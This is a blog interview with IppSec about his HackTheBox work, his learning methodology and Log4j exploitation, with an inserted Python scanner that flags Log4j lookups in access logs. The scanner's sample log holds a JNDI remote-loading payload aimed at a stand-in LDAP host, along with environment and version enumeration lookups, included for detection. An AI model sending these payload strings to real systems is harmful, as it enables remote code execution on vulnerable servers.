Hey guys, I have an absolute treat for you today, as I have been speaking to IppSec of YouTube walkthrough fame. I have been trying to speak to him for AGES and he finally agreed.
I am positive you are all aware of who IppSec is, but in case you are not, he is the guy with over 157k subscribers on YouTube and 66.1k followers on Twitter. His videos have helped and inspired so many people to get into ethical hacking and get started on specific techniques, and with over 7 MILLION views on his videos he has become somewhat of a guru in the CTF world.
IppSec has a great website which is essentially a search engine for his videos but instead of room and server names you can search for a specific technique or term like Nmap.
The first time I became aware of IppSec was well over a year ago, whilst trying to get my head around tmux; I came across his channel after finding the video ‘Introduction to tmux’. He is a great teacher and ridiculously knowledgeable about what he speaks on.
Something I was completely unaware of until speaking to him is that he actually WORKS for HackTheBox. I reckon not a lot of people know this fact. I am not surprised given his skill set and how good his videos are, but I had just never seen or heard it anywhere else before.
You are going to love this interview:
You obviously work in cybersecurity/ethical hacking; are there any clues you can give as to which role you currently have?
I joined HackTheBox officially January of last year (2021) as a “Training Architect”. I still don’t really know what that role means but I view it as a Senior QA (Qualified Assurance). The only other person with that role in the company is 0xdf, whom I convinced to join HackTheBox right after I joined. We go to various departments and do our best to help out, train, and put processes in place to raise the bar in what we release. One of the biggest focus points last year was on our weekly machines and based upon the machine ratings I think we did a good job. I can’t remember the last time we put out a machine that used “CTF Elements” to teach lessons.
An example of what we define as a “CTF Element” is communicating with the player to tell them to do something; this would be like getting a shell on the box and finding a text file instructing users where to look for the next step. While that does make it quicker to solve, it robs the player of enumeration skills. We always try to make sure something stands out, either in a log file, a timestamp, etc.
I also work on a lot of projects that only business partners of HTB get to see, such as a “Candidate Assessment” Portal, which allows companies to use HackTheBox to vet candidates or measure the skillsets of their existing employees. Another fun project I am heavily involved in is the CTFs for Datadog that allowed users to attack a server and then catch themselves (and others) in the logs via the Datadog Platform.
I have been asking for a while to interview you, but you are known as a pretty secretive guy generally. Is that about to change, in the sense that you would consider doing talks and training courses outside of YouTube? It seems a natural progression, and your voice, patience and temperament would fit perfectly.
Prior to creating the IppSec YouTube channel, I had a decent following streaming myself playing/commentating StarCraft 2. Unfortunately, there are also a lot of trolls on the internet, and I had quite a bit of anonymous harassment sent my way which made me dislike streaming. When starting the IppSec Channel, I figured if people didn’t view me as a person, I may avoid some of that harassment. It is boring this way and I gave streaming another shot a year ago, but some viewers put dirty XSS Redirects on a web challenge I was streaming. Thankfully, I noticed it before navigating there with my browser, but that was still a reminder of the past I didn’t feel like reliving. However, with my role at HackTheBox I have some motivation to be a bit more open.
Your videos are a massive favourite, not just with me but with the community as a whole, because of your huge understanding and knowledge of many skills in this field. What kind of stuff, like programming languages and operating systems, do you tend to use most?
I don’t really have a good answer to that question. I change pretty frequently. When I was a kid, from like 2004-2009, I ran a tech blog that tried to put out posts every Monday, Wednesday, Friday, which forced me to constantly pick up new things and figure out ways to explain them so other people could follow. I think many people would be surprised with how often the material I talk about in a video is something I had learned from doing the box. I never went to college; pretty much everything has been self-taught.
How did you get into ethical hacking?
Ethical hacking has mostly been a hobby. It started out in my early teenage years playing with reversing video games and instant messengers to build things to mess with friends. However, I had always been hacking up random at-home projects or building crappy middleware for work. I was never a traditional pentester or red teamer, and it wasn’t until 2015 that my role was purely in the security realm.
And how did the videos come about; did you expect them to be as popular as they are?
I started doing video game videos back in 2010 to help my speech. I have/had Rhotacism, which is a speech impediment with saying certain letters, most famously the “R”. If you still don’t know, think Elmer Fudd or Kripke from Big Bang Theory, as they are two pretty popular characters that shared the impediment. Gaming was always a passion, so I streamed on Livestream playing and talking as part of speech therapy to better myself. After Livestream, I did uStream, then JustinTV, and then Twitch when JustinTV rebranded. I actually knew a lot of the Twitch Staff and was probably one of the first affiliated/sponsored streams.
I stopped gaming when I switched job fields to security in 2015. I noticed my speech started to slip around the time I found out about HackTheBox, so I started doing videos to work on my speech again, and it also served as a way to peer pressure myself into being consistent with my training. I also wanted to be a SANS Instructor at that time, and the videos were a way to build that type of resume up. If you asked me a year or two ago, I would say I’m surprised with how popular my videos are. However, I have noticed a lot of channels that focus on production value get a lot more views, which does make sense since they are appealing to a larger audience. But I was really hoping the quality of my videos and the ability to search via http://ippsec.rocks would be enough to outweigh my lack of production/advertising.
I spend a lot of time on TryHackMe, and although I am a member of HTB, I’m not going to lie, I find it quite intimidating. Any tips for people like me who would love to move over from walkthroughs to more CTF-type stuff?
First off, I think it’s important to understand why HackTheBox is the way it is. Over the past year we have put out a lot of “Guided Learning” material which is like TryHackMe via Academy and the updated version of Starting Point. However, we still put out a lot of “Exploratory Learning” material which is what people find intimidating. I know this isn’t a “fan favourite” approach as many people have moved away from the “Try Harder” mantra but I believe we fit the middle ground.
The main issue with depending too much on Guided Learning (Certs/Walkthroughs/Etc) is that all the material is built to work and tested to ensure the commands they provide do work. This sounds great, but since there is always instant gratification when you copy and paste an exploit, you never build up the skillsets of debugging when things go wrong or the stamina to keep trying. Exploits often will not just work out of the box, and if your previous experience with an exploit was that it worked, when it fails on-the-job then it is easy to assume the target is not vulnerable and move on. If you practice the hard way you may think of other things you can do with that exploit (ex: instead of RCE, just leaking application secrets that can forge a cookie). Or even just simplifying the exploit and, instead of using it to get code execution, try putting in a sleep, DNS request, echo, etc. to verify at least a piece of the exploit works.
If I was a beginner, I imagine my methodology to studying would be:
- Establish Your Methodology: Read writeups, or watch videos and work alongside them. Don’t worry about “spoilers” ruining your learning experience; there will always be more boxes.
- Validate The Methodology: Watch a video in its entirety, then immediately do the box. If you are short on time, then divide machines into parts, for example watching up to the user flag and then solving the machine.
- Work on Memory Retention: Add some time between watching the video and solving the machine. Start off with a few hour break between the video and solving the machine. Eventually, graduate up to waiting a day between. Don’t be afraid to go back and watch the video when you are stuck on a part for 20-30 minutes.
- Make Hacking Muscle Memory: Watch multiple videos but solve the machine yourself days later. Having watched multiple videos or read writeups before solving the box will really test your skills.
By now, you should be able to do machines on your own. Solve machines and use the video if you get stuck for too long and/or when you finish the machine. There are always multiple ways to approach the problem, and it’s incredibly beneficial to see how others are doing it.
While doing this, keep in mind it is extremely tough for everyone to stay motivated; don’t give up! The toughest thing about this field is the lack of indicators that you are actually improving. It’s very easy to hit points where you can study for a month or two and feel like you’ve made little progress. This is especially true when the thing you are learning is how to struggle and figure things out, which is a skill you cannot get from certifications/courses/etc. I strongly believe HackTheBox does a good job with that skillset. I believe one of the biggest misconceptions by the newer teachers is they think Try Harder means banging your head into the wall; in reality I always thought that phrase meant take a step back and change things up slightly.
What types of benefits do you think Exploratory Learning has?
I build many of the UHC Machines on behalf of HackTheBox (UHC is a streamed hacking competition). Obviously, Log4J was a massive exploit last month and we featured it in UHC. If you watch the stream, many people find the Log4J vulnerability successfully but fail to actually exploit it. Many of them went to a room that John Hammond (great guy/friend) made for TryHackMe. They did a great job on being the first to have material out for the exploit, but to be vulnerable they had to configure it with an outdated version of Java that supported Remote Class Loading. I don’t believe the room really stated the edge case this was configured in, so a lot of the UHC Players were frustrated when the way they learned to exploit it did not work because our UHC Machine had a modern version of Java. Not a single player knew about the “JNDI-Exploit-Kit” because the “guided” learning material available did not utilize it. However, Twitter and threat feeds made plenty of mention of it. Additionally, players only knew how to get code execution when it was vulnerable in that edge case and went down a lot of rabbit holes trying to get their exploit to work, for example obfuscating the class thinking it was Antivirus blocking it. If you watch my video (LogForge), you’ll see me do a bunch of enumeration from the exploit, such as leaking the Java/OS version and environment variables, which would have confirmed why the Remote Class Loading wasn’t working. The enumeration is simple, it’s just putting ${java:version} in the URL for the exploit, but enumeration is really tough to show in guided learning; people skip right over that capability, go straight to running code, and miss it.
Another example is with ProLabs, which are enterprise networks built to replicate what people may come across in a Penetration Test. This lab starts off exploiting a WordPress box and using it to pivot into the internal network. Once you compromise WordPress and root the box, you can get other users’ credentials and use them with SSH to pivot. Credentials get changed and people think it’s completely broken and give up, asking for a revert. However, there is some automation in play to make sure root’s SSH key does not change. So if instead they grabbed the SSH Key, they would not have this problem. I could put automation in to prevent the user’s password from being changed to make it a more pleasant learning experience; however, many enterprises will rotate credentials (especially if they detect a compromise). However, they rarely will rotate API/SSH keys, especially when it is a shared account (ex: root). So, this is a valuable learning experience that would be hard to capture from just following a walk-through. Yes, there probably have been countless hours wasted due to that simple thing, but everyone I talk to in Discord says “oh man I’ll never make that mistake again” because of how simple the workaround was.
I take a lot of pride that many of the blog posts about passing OSCP end with “then I watched IppSec and learned methodology and passed”, which is a testament to the HTB Learning Style. I met one of my now best hacking friends, 0xdf, at a SANS Conference, who like me was just a computer person but not security prior to HTB. He has often said how much he learned because my videos taught him what he needed to know to do HackTheBox. Now when I read his blog or just talk with him daily, as I got him to join HackTheBox with me, he’s the one teaching me most of the time, as we do boxes then chat about our paths afterwards so we can create our own material sharing what we learned.
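From a defender’s side, the enumeration lookups described above (${java:version}, environment variables) are just as visible in request logs as the jndi: lookups that follow them. The scanner below is an added example, not code from the interview or from HackTheBox; it walks constructed access-log lines (all hosts and addresses are made up) and classifies each Log4j-style lookup as a remote-loading attempt or as runtime enumeration.

```python
import re

# Constructed sample access-log lines (not real traffic), for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET /login?user=${jndi:ldap://198.51.100.9:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:12:00:05 +0000] "GET /login?user=bob HTTP/1.1" 200 512 "-" "${java:version}"
203.0.113.8 - - [10/Dec/2021:12:00:09 +0000] "GET /search?q=${env:JAVA_HOME} HTTP/1.1" 200 77 "-" "curl/7.79.1"
198.51.100.4 - - [10/Dec/2021:12:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# A Log4j lookup has the shape "${prefix:body}". Capture the prefix and body
# of each single-level lookup anywhere in the line (path, query or User-Agent).
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z]+):([^}]*)\}")

# jndi: triggers remote class loading; java:/env:/sys: only read runtime state,
# which is the enumeration step the interview describes.
EXPLOIT_PREFIXES = {"jndi"}
ENUM_PREFIXES = {"java", "env", "sys"}


def classify_lookup(prefix):
    p = prefix.lower()
    if p in EXPLOIT_PREFIXES:
        return "exploit-attempt"
    if p in ENUM_PREFIXES:
        return "enumeration"
    return "other-lookup"


def scan_line(line):
    """Return a finding for one log line, or None when no lookup syntax is present."""
    if "${" not in line:
        return None
    src = line.split(" ", 1)[0]  # client address is the first field in this format
    hits = LOOKUP_RE.findall(line)
    if not hits:
        # "${" present but not a single-level lookup: still worth a human look.
        return {"src": src, "kind": "unparsed-lookup", "lookups": []}
    kinds = {classify_lookup(prefix) for prefix, _ in hits}
    kind = ("exploit-attempt" if "exploit-attempt" in kinds
            else "enumeration" if "enumeration" in kinds else "other-lookup")
    return {"src": src, "kind": kind, "lookups": [f"{p}:{b}" for p, b in hits]}


def scan_log(text):
    """Scan every line of an access log and return the non-empty findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Enumeration hits from the same source shortly before a jndi: hit are the signal worth alerting on: they show an operator checking whether remote class loading is even possible on that JVM.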
Other than doing the HTB servers what else do you do for learning your skills?
I do other CTFs occasionally with friends, but primarily I just try to read a new book every month on topics that interest me and find projects to work on. When I was a sysadmin, I built a C2 that was primarily used for IR purposes. This was before things like Splunk and Sysmon were popular, and I did things like hook the event log and run some basic IR stuff on suspicious logs or on a periodic basis. I also played a lot with Arduinos and Pis, building various stupid home automation stuff that I have mostly scrapped by now. For example, I had a webcam hooked up to a Pi that would read license plates outside of my window when I lived in a Townhouse, and I set that up when car break-ins were becoming a problem. It’s not really beneficial to hacking, but the skills are transferable.
What other hobbies do you have (if any) other than hacking?
The majority of my friends are not computer people. Before the pandemic we played various local beer league sports such as softball and kickball. Nowadays, it’s a lot of hanging out and hiking. With the new year I want to get back into bicycle riding.
With so many people wanting to get into CTFs and Bug Bounty nowadays, any words on what would be a good grounding for them, some stuff they should learn early on?
Personally, I don’t really like Bug Bounties. On paper it’s great, but both the hackers and companies try and take advantage of each other. Companies try to get cheap security and the hackers try to mass report in order to get as much value as possible, for example reporting an SSRF as every possible protocol it can speak, LFI, etc. when in reality all the vulnerabilities come from the same line of code. To get started, I would recommend the path I said earlier on getting started with HackTheBox, or taking the OWASP Top 10 and searching the vulnerabilities on https://ippsec.rocks to see myself exploiting and explaining them. There’s also the Bug Bounty Hunter track on HackTheBox Academy which helps lay out fundamentals. I believe it does cost ~$70 USD, but a lot of the modules in that path are absolutely free.
What’s the plan for 2022 and onwards?
I don’t have any major plans. I’m hoping to get to a point where I am releasing more than one video a week but I’m spending a lot of time working on some cool projects for HackTheBox. One of the main projects I am working on is improving the stability of the Pro Labs and adding a lot of features for business users of those labs.
Please give him and HackTheBox a follow and subscribe at the following:
IppSec Website = https://ippsec.rocks/?#
IppSec YouTube = https://www.youtube.com/ippsec
IppSec Twitter = https://twitter.com/ippsec
HackTheBox Website = https://hackthebox.eu/
HackTheBox YouTube = https://www.youtube.com/HackTheBox
HackTheBox Twitter = https://twitter.com/hackthebox_eu